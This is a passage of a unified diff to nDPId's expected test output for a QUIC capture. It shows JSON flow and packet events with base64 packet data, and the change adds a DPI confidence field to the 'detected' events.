 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1621432545371,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432545371,"pkt":"AAAAAAAAAAEAS1QMCABFAAViYPlAAH4R+r6okEAFCUGp\/O2JAbsFTlWIxP8AAB0IC3jlg9iBHxIANwCHrPC\/4ONhhPa4\/bkucOa0ccMbRx\/dWQUxDvvPbBbSBV+QAXzHkO\/ek8WDdft4J2H6iGctCUVE\/Vd1az8ukuRtgZHkNe9HsjHNPcO9gC3hoF0jI1WUFpr6W\/bvPAMD0ojxS\/Jat1yERFCwK1qTZjHTu5Hq2GxnTFLRrBvKpajRH4mp0PBh9N1EEyOXmqHY8RR8CFuGBAVrGssOFJJLCgoPFYWi4kU+3Er5AjbG6hAThXTq5QSrnvRF2NsfVwKcZH64AJtDNhF1vVsm5Y8FPRr0Bw0OMhHo5TfDD9554NzZqybC30Lzg75oLfpGADza1+jH3enNvlyD\/9OdXxVtLFBPpK+tc1S0j2l24nUXrhfgzMYJSGfusfan3MputzKVw0xaEMSTFnMyVXBwvQvsJpXe\/cfXTGaPcz+n+4PtyXFFeq1VFMb38KcaBIZAXpjtbjsKy1u0drs8\/lS6zg0B+XEXyyVbBHNPSwQzvYAFgbxG5T2f7cZpDXxonb7KKJeiTREIg53VKn6taxqerf\/EROOn+QPkvNTMzD2dTm5TFHSYxLvBV5+O6FgwNIPd9zSQjxu\/PIgbyOa5d1rycolz3RRmObJ7xDqSBQEx9uBtKS475iYE3\/HVHr98HbKghpyBXtrfiFCJfUPvGhf2ZQTE\/2PgBc4nFIolPbu5IHP5jlx9YJheTrRtsN8xZyNylrQiJyWGIJ+sqW7NQD4PtZU8og15AsUXrhsGP3nifKZ2RW8ULO\/zQ4hjXLbXvVPCRMaOfTnRWz16ymzmazGc\/A9WtT81r16LRVyV3KW5BVcHMerZjTINdFBiN2Rss9YE+hg2Bdzx0FHiLD2SJTldPbPASYuxvZBuOv7vGEJxC\/B7ThuZCvaUXSTwfSYdYePG5WL2Y3bz72m1SZEmn+4Kiqq\/h2MEhMWL2wbVTZ8FAX0VWRfwhSMlOHHKMW3u3baADN0N+mh8BW\/zOcs6XrHPEAtq\/4pbenpQ2rrBUepHw7wEl2Gy7TOdtirMeicrvRMH5ROutCuksQv6EbOTonl2eA9Uzw3fk+NLZelZDt7+chmNI0wDo+\/LKiADiMtDwBrUShAJhuyJCYkzqz3+\/I22nE9z8jtSau8DwJe8rGnUypF+QexVaXFHzHrGc8pEc6Gv1V+yd7O9j1BH6SI99CGYQ4qUSe+Qvf17MPqt6Vv5BD2ZiEf2go7Ms8wrYgSzdW2J6h2lnH8T12duhSfnaN+XilOPE6QCReHpz3pNB7sD3txciXal1Cjtz+D52skW92QHoQ6HQJRVcO1F+Nt9Ms6O4a82MSiFPLyQ4+9HZ8XzRNGIA6bYEMtQ2VoveeK36tJK5jcwcf1bd2KXco4wwhd6yGi79yvfAr9Gnfa+nm9EvT23xLYwd6SLl+UW2Yy\/cUnjlQIjkF+Nl2AFUyHKqbZX2R5uA7ATglq8Z5hVDirutJRbMvjB3S6p209yWJX36GoCAlZULNNq4O\/K9HsfmRuSQzzO8vAnTtDfmAG177+f\/BH\/oOcDleRinaIgIUXyhxOMJNHNbCiUdxlGmVs0Kf\/YtICcdSgbpsnkh7sZqaLRn0qnOt+5wry5o8FjthI8Fu2te\/X8Ye4gIOivJjbZs+RLhZQxZWtt03HV6ev4z867dtIUmron46fcA2edbLbHQ119w4dS3GwaljEI9565fGeAZxLwyqZbVZ07sOBYRGxKVWe9qlVpepdG7mzZWTkGm1aG8jBuv1yWlVaWyIe\/5D3F\/Zn\/LsMgNe+1ozo\/g3Qq8MWGLKjZnwl7\/\/\/D"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1621432561767,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432561767,"pkt":"AAAAAAAAAAEA737VCABFAAViWJxAAH4RaSaokEAFqVGj4dlVAbsFTh0rwv8AAB0IWitP07hFwPIAAEU0OQ8EdQTKeE\/y3KmcSMkX+qEOqn52RlGrldbICsY\/S34wZNRn+08waAiGjsEVTtahcIPi35YuHK8wq0g59jo9OBg4akM\/IBMGR7R84CJBN461mppY8jQVuZTPgmTRdB2IYpULPqPfoX1v+i9gHbqu5NK3OwzMLconK6EyplQxCPNt5Hf30K95kk3qNJtwkSisClc72nLsoaYauap5qms4Uf\/J91\/kVmZMeIlYa1jjcfZ3z0VI9gHepy0CkQxYfepscIvVGFIBRny+Rr6Mo5Wdi6EIb\/T5QSBed45QkLsJA9gUQEq7M7LKJgg+IKLvJoW43JTt7tWUALAA7xqNg8ZMlYbspeUjoDBFwmTYyCGMZ5bdPdJsCKJjP1zB6Ihkj9HzcCVcVpCt5y5VRUWbI3s+SuMDcnwmhOo2Cnlr0DZfIFBqUld4Y4RY5VqVdeJo7oFXW7AwYc+nzTUTjYB7sFAHoCxtg3W+GcMFoxOtPlRytxdZ5wbadwjKEwqJuIJpIaPT9Hl5ErVl3zaNl7AbKrrPwnZr1V\/c2RNnNxvqBfO2+OD+glALVErSZ8Wgf5WaLzvHB8WMIbmug\/NFM\/SLKtJ\/BaWEqzeoVef0rMzIe7N3WaGlp54AM2gUWArP3379QDPnly3sySsTiCLjmgz\/a\/YAV8iH0MWGhxoXL8uO+18tMZKic96P3qCeZ8y7LR8W+ULC4hM7PW26ZmpzKFTv+x+dXax\/FbNTBDPTQMmIlCH9iOw143\/ImSuF0s3s4JVp4Qr6CGbUM7wVRHYWtzpVhyLQMg81Qv2OEiCnOjzFFBbzp\/0bJKOqHRD4Q\/MvBarEfeFcKiSbAbTSNM8PQgQqkr0ZRwugcr2Ffp+Gn+l7xOOzT42OiObWh\/q5Vz8yxCjvr\/A3rCWwstbOOV346nm7SzYmCeDdLhhv6lnhMiAKqzz9Y+7ejwsae5M2M3swKabBXR4s56U0TQF+O7sfltB20eE597p4k5i6pwoHpILiBDttMLzjO7dc91E1IYlMz1tAgL+S9RvKr72GqDN6ZnJlEhDdKvlV5HT1Hkn9kqkuTTOQ0XHul3D3GFcWCqjADIqlVTcjrCO73smKB0a4uTZQbOIpVVIdV6+6r6fVzLgJO5GsuxJaHTgytCf3she4LLg13wNSfnN1MfvyZUdUQE3f3vPJyjzsirq8bCev5LQkUR9nijtvOuY+AYdDoq9V3BpiAPC\/5krfJFIpYwodSbeepb3MzG81QlFd2eB1ghaJpx0Lkod5SIZJSovz09xRaU2rOvyKR8WRRif52MUKIukeKGfbFHZtrKxCIiJ0BDLx\/i+Ol15n6ZZ7Ufce2YGrldvNoQcB39pF13M2xxh0ga17XgFyOLwQChgB\/CIi0XzrAp5k8ZwTJaYDryhvEy+QLvWWBRLc0grxIicpNZZajbTUE+i952VB6IrVqmtuYgLUVGpF7YVtpu59m6nPy+7bYq81ByFXlwxoThbET2t5Xwh4tKj2kEGlA4a\/A2nbUyPihPkju\/hgap4rdGkxuysnOZqlWiIRDL9NAexX29gx1xqsSqsDeI+D4cJhsXJ2P5ihR\/sHA3rpBQJRT+rRYmYWzUeoZmXY\/d+n2pZTXUwAQIcY2gZ61ZU3fymYydiwOlVXMdRNyaSlDGExGzYNiSdgFAynC4TF209BUTK\/I6hsurJHhtkEW4PNMZmrFy1b37DXFZ2+N3Li+vjPgOwB0NUwzN9CtFWQGGZdoOh+DGOlpM73XGxkM8fpT6xsMV7tcylekSF9KrwkYBnC"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -158,30 +158,30 @@
 00628{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1621432687153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432687153,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+xVAAH4RF\/KokEAFcfqJ88+HAbsFTkZ0zv8AAB0IUFF8ZbsplgcANwA8pfqGZZe+H8YbVevtEq0uW3yOyXta0h88u9QuYUdq8LE0sDqOmyGjxvU7MaDIbVqplgETW\/NE\/cvaMSDgL9CHXru0efaH26aRrBGKK\/el8kZH3UaZy\/b9fmgdZ9mmXS5myo5Uucklk32jY0nKiPx7OwGdOw\/13D\/yhjhsJPO9lxfnt\/xrx5w2VANECESU2NEWkJRxhIc\/dJshO3z01DVcn1fIfmiyloSgZUd+\/HKai9If5RANhfzeQXioPpPbOoecz6if3Z3FtQKFLotx+aOWuKKAGGc0cyrUXi77xeLDAxjE6tOM9yaGQcFFgEY\/SOBwtvWDdb9NoQWO7p11EUZ+wl\/rZ5GXlvPXsY8mh6Clgitpg7R24nHSXQN0B06887mB4HnoNDeAmXGTVqNUO5Hwpt4Nv5fOd\/uAYlaCVVGeZWnQSUt3FSt6UlJWCYhZFk40gfKSsTtWeOQIhnNtUP5+zwa3UUHni3XmISHlQzbBz\/bS0jB08K8r4MbQ1k++PfwYjBxXo33Ojv377xL3kEWdt7dqkANX+xOLqZ4hYjJtVeJE6KaWK5kxNrvgI4+Wbq72iTCPnuWu4Yc+04d7b\/zeICLVlQ4UJomN5dkhXIvTFKQ7NG0K7rxpiRWOcSPWgsWX4wFJhAUCcqoK9wfw0ZMIl8zrsdDk5l5X+x8MTT+SQICOrIXn0ZSpTbD3Xt68fdgFWkqOjWnFQHPy3Iy3RczgAeN7wIYFfuCnnC6ME+5Pu63Pk2iPfP7TzEvCq+iYnwhXaGT1sDWUzQDz9Ea\/yyYCqRPN\/gqIRL+pXgs9ex+9iKQaMTnc0vlqASRWWCZPNc2rf\/Q9eHHk4W3NPoX3ez56VofMyV9x8Kx7xSgFDFLRY80kBMgLWMJDfi6woBPhXKsM4wd2mLvh7\/wW+nGUcZMc5X3DVUUiDmGzvF7qBR8QzheMOnqAvFyKMGSpJJ5Ps0oPIRQEBEONuBTdMtasa9lBz6DGcqXqeY1rs9cdoTZaeh1CgiDqdZdsgdaBb3PTBxELCiZg3Mjn2Ot0f4S6rODt1khthCXa+j8H7di6Uu0LktCHPUKJullar39r7GXB33cmiLI1UYXrrTv25S4DhWZdTftmpBXDFOwlNLMeatZGrEKK7zLzeIx5rioedbNSfdLfUi9tYWh0gPPFQENtKlJVn1Gyol7zm\/QqNOvgomZt6RUw\/PI2OFl+9zsCQmj6uTnByKe6c\/tZrUT6N2R5lvUzAGZIClGGsFR4e4cmvkmiIdEOo+lEW9ZEBcUKvujsGgkc9cAkZMsNkFQc\/PgQpvfYqWlnRu5wnZk6Sv5jPr2LTnEt\/ndr7UGSNAG3nto3fdM2CWZImFEJlzxZcJ6Pjr\/DX1+sbuL0VJWf56xETi07cgoGnD9splJhqvifjBi5hE6IKs1smgIDugqMeU+hKZgmx0tlIBEDohI\/weDtB6ZoTNVzeCrtE9Ne5sHna3EbB6mrF1wOyF+v7JqhFt1AklERk8cvtUnrNY9KDllJiAIoy8SJ+lKPlC22sDEHqftvcIo8mS2cppG0wllO2Q1TclT9pjsn1nIhooutFD14OqIrVo62MaGWaUpxzW8sZy1SVksc06sGqCdoo8s5qQi7Gz1K7yZhZo6W82as73l\/bfhqszTmMajohCA0Y9MFT\/+c5ticaJcK8VZzHx\/4ndP6BdrrmvIMXm4MvPY0XbZvr4Jyhd\/FOn6vdTJUGitV6mUWBc8Qn4h5NGpTVY3jRUrKJ\/3UHMEn9NXaFjwDa+i\/lDWeXt3KF5YT"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1621432793457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432793457,"pkt":"AAAAAAAAAAEAgb5NCABFAAVi1J5AAH4RSeiokEAFmIBX7sOZAbsFTp9JxP8AAB0I7Hz6xe0rqSIANwDXZeiBOis1quzsT\/obGG0x+3XLqfDbWYiwJuWBqOtEfIn\/ZPOFbr4OpvKQaBk8YcaDhmjs8G9E\/bYLKxuZyad2DEvamcZFVtntEFziXhXn3+pQrDq\/AMQ6LmeqWyyt9eA3XDKtJ4xY1Bc6e9UD8t6D7Sgm5IQhV9SFnw3BxVaQkrl6hR\/dDVS5UMps0rHJiqJfxJX9XuDk7Hfp1cVZA24xlVPWJVRY2UAeIc2Zve2M7H6lmFiRWRA5qAccgPetxVIxOWgKJZ9rY8EXMEmXdS70H4KMbgsfK9Uk6fu\/osiRJWk7Bzz5wQrxWL6dXRJrXxAa2jPXQHVxa7bP8D1pdmGboyWwgZYxklQYJNVQxDA\/GDYY6fvGJ263gPtNp9NnfpJaf3BoWuUPhFP8HvGyQZuIQF1wb9fZXWZ3QHFoIdW68Pqhjnp6kLZ063TmjYYZ4slUYelhsLCLrNb\/dwHKwXnK6PjPM5zy5oxTVIu9HQIZmJtKxSSYJD+ceykV8\/K7hgP3LMhoq\/OjNgE2xqsoCuttGgVjAKWqToZ2SAfQBRXiQmcgW52dCG7Z5HhuDaq\/hB4oOHiiK4\/S0BBNT5M+Pb8ByPul+j0MGVAtYn6fTilvMPrguU47PCHZjjk0z9Wnk26G01zXhhAY0ar4RNDDEzDjmKfqXKVxSDUlPPUIWjq1afjceK2zb3JDwK58fh96mr6zd+glDvfAbQkGN5MH6eMa\/9wzaGAa3ufoLka8Lxli3yUdMj\/VZs9FXs\/jqxxOPuE\/dCtF2asx1eqF6Dv896U\/rfqEfRamU8Y4w+RgEO1CTD7sshtD1igsz3xv7fwlgvoMBlSMrIYm2kXO5Mm4rUbFhOvxSUXvhCAz80phe1BldOJ\/juAj8qGCoV+gQOWqnuDFHTVXEB73DtcArIBGJd9D++3m82t+emgLBdig+H7CGHczwalju210OQ3B+NgGpSSFA2TExawDMw2BskyWcMWOAJB+1YPrBoF06DgneuWy+G1EzSXWEKGoBP9Hvvi3iiO3IcHdBaysDd3G163RjNVGtjxLv3H2wGiF8W8BtUy8x\/4x0t8GKV8DeHoRZAPR1VW9jsM9BHk3UFKs6e+5DG41zNnmrJMvsQCLdE7Mc8w4ELvM4HhyshxInLs7aAqATi\/cJpkJVFPEVzRSH2iJPYmG8HdHW+MR+R4aifCxPvUJqcMbXFiSZcU+MJ70p7YnFW\/gfvm4Ux4DbVMAkNpUImzqnQsubAKj0w\/8ulR5Wetc3zilx2pLq7DZxLdXVFjLXuRQmY2yCeGisGB5PUkdsGOp1IyO0idKFB6vegqD53wg8CaYEO5x0Hmz4Pk70XwPcVkukm1ulZSYY\/nmgbz541r2QMShd26Vqrvyg\/J8rOTVuiAbPswYJnJk0xDz7XloJ2aoIPRONK5nlUihp2bOw9Nuxf36SB6k0LSj\/s4mNxG1QNaEf5XxQTpLl1PynNmmtwiukSv5w+u6Dh3MmLJERlHtMy3fg6A3dZn2rVplpcATmPl3e6JcqSXfEQHaMUL9vqZgy\/h073US6J03VMt+\/bO+qzfltNYykBXZikfo2Jeay4vIVade7edcMHLP0kMMz8YzuMkFj5mSEOozDdFrwgdubKvf0WUvGC9sG0GJQuA6K0zS0AdH6\/IDWTjjKCqm0CNfUV3pEg1fuSIaLXiC27HEebsSGbBEc86cnhXJ6xcni7lN18XwT\/wRTUuZ4kfbyFf\/WQSlRJNS7ifRduPwfHvUgAkTi6eqDziLvnVkJ6BbPbv+fYGh"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
